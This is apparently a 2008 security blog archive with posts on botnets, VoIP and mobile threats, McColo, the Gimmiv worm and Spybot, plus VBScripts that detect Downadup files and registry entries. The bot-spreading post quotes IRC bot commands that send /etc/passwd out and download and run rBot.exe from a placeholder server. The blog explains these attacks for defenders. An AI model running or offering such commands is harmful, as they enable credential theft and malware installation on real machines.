I was going through internet for some recent variants of Botnets, Think what did i found, its a completely a new variant predicted by security researchers across the industry, government and universities. They have described about five kind of new threats which may be seen in the forth coming years. The one which caught my eyes are the "Threats to VoIP and mobile devices". And the researchers also say that the threats in year 2009 will be all about Data as the primary motive. As the mobile phone devices are getting more and more smarter and popular as a portable device for accessing internet and other various uses it is also getting more and more vulnerable for attack. The VOIP is still vulnerable like other computing infrastructures, the Cyber criminals may leverage this issue to attack, which may include voice fraud, data theft, and other various scams. The VOIP may also experience DOS attacks. Just think about a malware who infects a large number of VOIP phones and then it floods a network with traffic, and this result could be highly disruptive. The researchers are talking about developing a IPS system for VOIP at the carrier level. And also to develop a trust based network where only the legitimate calls get through.

As we all can see the new 3G mobile devices has changed dramatically that what a mobile devices can really do. As per the researchers "Financial motivation and increased adoption will increase attacks to smart phones in the years to come". As it is predicted that more and more financial transactions will happen over cell phones in the near future, so the attacks may increase in near future too. Already in Japan, people use their cell phones at vending machines and subway token dispensers. They also predict that the malwares will be injected onto phones and then it will turn the phone as a Bot. And then when the cell botnet is large enough it can generate DoS against the core network of cellular services.

The Best part is that the cell phone technology is still in evolving phase, so the the security can be designed at this stage, that is what the researchers say.

References:

http://news.cnet.com/8301-1009_3-10067994-83.html
http://www.gtiscsecuritysummit.com/pdf/CyberThreatsReport2009.pdf
http://www.dslreports.com/forum/r21277841-Cellphone-Botnets-Blackmailing-VOIP-Healthy-Cybercrime
http://www.darkreading.com/security/vulnerabilities/showArticle.jhtml?articleID=211600782

Botnets Vs Botnets

2008-11-17T11:33:00.001-08:00

Botnets - are armies of infected computers used to attack websites - requires borrowing tactics from the bad guys, say computer security researchers. A researching team at the University of Washington, US, has plans to use army of good botnets computers to neutralise the bad ones. Botnets are networks of these zombies and are used to send spam or launch distributed DDoS attacks. These attacks can cause internet servers to crash by overwhelming them with information requests from a botnet's computers. They are so commonly used to extort money from website owners. I Just came accross an article which says that researchers are suggesting of creating "Good Worms" which will go from computer to computer and get rid of all malicious things like worms, trojan horses and viruses. But the catch is, its a double edge sword this so called good worm can go terribelly wrong.

The University of Washington wants to bring together their own botnet; a good botnet and they believe that their plan would not only be cheap to implement, but would be able to cope with attacks from botnets of any size. This good botnet is known as Phalanx, the Washington team believes their system could render all forms of DDoS attacks obsolete. Instead of the server Phalanx is protecting access information directly, all incoming information would have to pass through the swarm of "mailbox" computers.

There is one more interesting fact that Security researchers have uncovered, there are evidences of war between rival criminal enterprises connected to two of the most sophisticated malware toolkits in current use. The cyber criminals are battling to own tens of thousands of compromised computers. The best available example of these kind of Botnet is Trojan.Srizbi, as detected by Symantec, Srizbi is spread by the famous MPack attack kit, This trojan when installed in computer it uninstalls competing spam malware being spread by another nasty piece of malware dubbed the Storm Worm.

At the end I would expect you all to go through the bellow links as the above post is not descriptive enough, and I leave you all a question, How safe are the "Good Botnets"? Kindly comment.

References:
http://www.techdirt.com/articles/20010824/1312203.shtml#comments
http://www.newscientist.com/article/dn13753
http://www.canadafreepress.com/index.php/article/2751
http://www.theregister.co.uk/2007/07/01/malware_gang_war/

McColo is Shut Downdown, massive drop in spam

2008-11-17T04:09:00.001-08:00

On Tuesday, ISPs stopped routing traffic for McColo, a hosting provider .The action followed investigations by security researchers found that McColo hosting for many botnets' command and control servers, according to an article in the Washington Post. The volume of junk e-mail sent worldwide dropped drastically after that. Lots of security companies found a significant drop in Spam traffic after the cutoff.

For more details Visit :

http://www.washingtonpost.com/wp-dyn/content/article/2008/11/12/AR2008111200658.html?nav=hcmoduletmv&sub=AR&sid=ST2008111200662&s_pos=

http://www.securityfocus.com/brief/855?ref=rss

Humble request

2008-11-14T20:37:00.001-08:00

Hi all, I have a humble request, I expect you to put your views on my
posts, all of the valuable views and comments will help me in
improving my writing and research skills.

Thanks in advance.
Regards
-- W & E

Soon to Come.......

2008-11-14T04:24:00.001-08:00

Soon to come more on RFID Security, keep visiting.
Thanks
--W & E

How the Bots Are spread

2008-11-14T03:36:00.001-08:00

How the Bots Are spread

The bots are spread basically by exploiting known or 0-day vulnerabilities, and after a successful exploitation the bot uses TFTP, FTP, HTTP or IRC for communicating and uploading files and controls, once installed in the target machine it tries to connect to the bot master IP address, so that it can poll itself to the server for its presence. The Bots mostly communicates over IRC channel using specially crafted nick names like ABC|789465 or [m3b0t]-123456, and joins the bot master's channel for accepting various commands by the following ways.

• The bot receives the topic of the channel and interprets it as a command

– <- :irc1.XXXXXX.XXX 332 [urX]-700159 #foobar :.advscan lsass 200 5 0 -r –s

– <- :[urX]-700159!mltfvt@nicetry JOIN :#foobar

– <- :irc1.XXXXXX.XXX MODE #foobar +smntuk channelpassword

eg:

– ".cp /etc/passwd http://<server>/mybot/"

– ".http.update http://<server>/~mugenxu/rBot.exe c:\msy32awds.exe 1"

– :.http://<target-server-for-DDOS>

Example: SPYBOT

This particular bot spreads through open or weak network shares, P2P networks. After exploitation it tries to copy itself as %Windir%\wscntify.exe and the registers itself with the following parameters.

Service Name: windows security centre
Display Name: security centre
Image Path: %Windir%\wscntify.exe
Description: security

• Common filenames used by Spybot include:

– Bling.exe

– Netwmon.exe

– Wuamgrd.exe

For further details and references kindly visit the following links

http://www.honeynet.org/papers/bots/

http://www.symantec.com/security_response/writeup.jsp?docid=2006-030315-2548-99&tabid=2

http://www.ca.com/us/securityadvisor/virusinfo/virus.aspx?id=35771

I have also tried to search for few good video on botnet, here is the link for viewing them

http://www.watchguard.com/education/video/play.asp?vid=botnets1
http://www.watchguard.com/education/video/play.asp?vid=botnets2
http://www.watchguard.com/education/video/play.asp?vid=botnets3

New Microsoft Security Bulletins Released

2008-11-14T02:24:00.001-08:00

Microsoft has released 2 new security bulletins.

MS08-068: Vulnerability in SMB Could Allow Remote Code Execution (957097)
http://www.microsoft.com/technet/security/bulletin/ms08-068.mspx
Severity: Important

MS08-069: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution (955218)
http://www.microsoft.com/technet/security/bulletin/ms08-069.mspx
Severity: Critical

New Media Partner For Worms and Exploits Blog

2008-11-13T23:25:00.001-08:00

Hi

I am glad to announce that with in the 1st day of launch of this blog, it was identified by EvilFingers and they expressed to become the media partners for this Blog, which is really a great thing for this Blog to get attached with EvilFingers. (www.EvilFingers.com)
--

W & E

Gimmiv and MS-08-067

2008-11-13T07:14:00.001-08:00

Recently the internet has witnessed as worm after the release of a emergency patch from Microsoft (MS-08067). I have tried to pull out few details from various sources for the viewers and put together for your use and information.

Worm Detail : Win32/Gimmiv.A (CA), Trojan.Gimmiv.A (Symantec)

This worm used the above flaw to exploit the remote computers and then steal various information form it, like, Username, Hostname, IpConfig, Outlook info, information about the patches installed etc, . IT creates the following registry keys as well after a successful infection and drops a DLL to %System%\wbem\sysmgr.dll

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BaseSvc\Parameters\"ServiceDll"= "%System%\winbase.dll"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BaseSvc\Parameters\"ServiceMain"= "ServiceMainFunc"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\"BaseSvc" = "BaseSvc"

HKLM\SYSTEM\CurrentControlSet\Services\sysmgr

HKLM\SYSTEM\CurrentControlSet\Services\sysmgr\Parameters\ServiceDll=”%System%\wbem\sysmgr.dll"

HKLM\SYSTEM\CurrentControlSet\Services\sysmgr\ImagePath = "%SystemRoot%\System32\svchost.exe -k sysmgr"

The remedial actions are already published in CA and Symantec websites.

http://www.ca.com/us/securityadvisor/virusinfo/virus.aspx?id=74579#section1

http://www.symantec.com/security_response/writeup.jsp?docid=2008-102320-3122-99&tabid=3

The Following BID are available for further reading

http://www.securityfocus.com/bid/31874
http://www.securityfocus.com/bid/19409

Reference URLs

http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx

http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9118100&source=rss_topic145

http://blog.threatexpert.com/2008/10/gimmiva-exploits-zero-day-vulnerability.html

http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36809

http://it.toolbox.com/blogs/talk-to-the-hand/gimmiv-worm-feeds-on-latest-microsoft-bug-27955

Worms And Exploits

Yet another 0-day for microsoft

New Variant: W32.Downadup.C

Exploitation of MS09-002

Kaspersky Hacked by SQL injection

Trojan.Brisv.A Infection toll again

W32.Downadup Removal Tool

Botnet and DNS

W32.Downadup Infection Pattern

Zune Player Bug and Fix

W32.Downadup and W32.Downadup.B related to Bot and Botnet

W32.Downadup and W32.Downadup.B related Bot and Botnet.....

This Trojan when executed create files in "Program Files" folder as an exe files with the following names.

This also modifies the registry value as per the following:

I tried to write two small VBScript to find those Botnet executable files in Program Files and the relevant registry entry.

Find in Program Files.

strDir = "c:\Program Files\" 'Change the location of Path of "Program Files" according to your location

Set FSO = CreateObject("Scripting.FileSystemObject")

Set objDir = FSO.GetFolder(strDir)

getInfo(objDir)

Sub getInfo(pCurrentDir)

Dim checkName

Dim checkVal

checkVal=False

For Each aItem In pCurrentDir.Files

If LCase(Right(Cstr(aItem.Name),4)) = ".exe" Then

if aItem.Name="msgaurd.exe" or aItem.Name="soundmax.exe" or aItem.Name="mediaavi.exe" then

checkName=checkName + ", " +aItem.Name

checkVal=True

End if

End If

Next

if checkVal=True then

MsgBox "Bot Files " & checkName & " Present"

else

MsgBox "Bot files not present"

End if

End Sub

For the registry Entries:

const HKEY_LOCAL_MACHINE = &H80000002

strComputer = "."

Set StdOut = WScript.StdOut

Set oReg=GetObject( "winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\default:StdRegProv")

strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

For i=0 to 2

SELECT CASE i

CASE 0

strValueName0 = "MS Gaurd Driver"

oReg.GetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName0,dwValue0

CASE 1

strValueName1 = "SoundMAX Driver"

oReg.GetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName1,dwValue1

CASE 2

strValueName2 = "MediaAVI Driver"

oReg.GetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName2,dwValue2

END SELECT

Next

MsgBox "Trojan Entries Found:" & vbcrlf & dwValue0 & vbcrlf & dwValue1 & vbcrlf & dwValue2

References

W32.Downadup.B registry removal tool available......

Rouge software detected ExpressAntiVirus2009

The Activity Increased on Port 445..Due to W32.Downadup.B

Just some updates about the W32.Downadup.B......

Yet another variant of W32.Downadup Just before new year....... W32.Downadup.B

Interesting article about ECard Virus...Must read

CastleCops no more online....

New Zero day on Microsoft SQL Server Stored Procedure 'sp_replwritetovarbin'

Internet is too slow from Past few days......

Relief for MAC users Now, from Viruses......

New Posts to Come...

Chinese doing Corporate espionage.....on Indian IT Firms

IE 7 Zero day Exploit delivering Domain Demystified

Microsoft released security advisory for Internet Explorer 7 zero-day

test

New Rouge Software, PrivacyCommander

Radio Frequency Identification (RFID)

New Malware Analysis Partner

Hi Readers Keep reading...

New Worm Attack Nov 2008: Exploting (Microsoft MS-08067)SRVSVC RPC, Remote Code Execution

Some Delay in next blog...